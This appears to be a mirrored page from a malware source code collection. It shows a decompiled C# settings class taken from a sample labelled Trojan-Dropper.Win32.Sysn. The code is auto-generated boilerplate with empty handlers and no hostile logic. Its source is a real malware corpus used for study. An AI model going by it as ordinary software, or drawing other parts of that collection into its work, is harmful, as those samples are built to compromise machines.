mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
f2ac1ece55
add
31 lines
1.1 KiB
C#
31 lines
1.1 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: Poly.Properties.Settings
|
|
// Assembly: Poly, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 618F3010-979B-4F78-8F99-D5C35E30AA2E
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Sysn.bshb-a13f90b28df8b73652beb4c3c95ff1b8dc0c2fc41dee8f7d6acdd43828a0aadc.exe
|
|
|
|
using System.CodeDom.Compiler;
|
|
using System.ComponentModel;
|
|
using System.Configuration;
|
|
using System.Runtime.CompilerServices;
|
|
|
|
namespace Poly.Properties
|
|
{
|
|
[CompilerGenerated]
|
|
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "10.0.0.0")]
|
|
internal sealed class Settings : ApplicationSettingsBase
|
|
{
|
|
private static Settings defaultInstance = (Settings) SettingsBase.Synchronized((SettingsBase) new Settings());
|
|
|
|
private void SettingChangingEventHandler(object sender, SettingChangingEventArgs e)
|
|
{
|
|
}
|
|
|
|
private void SettingsSavingEventHandler(object sender, CancelEventArgs e)
|
|
{
|
|
}
|
|
|
|
public static Settings Default => Settings.defaultInstance;
|
|
}
|
|
}
|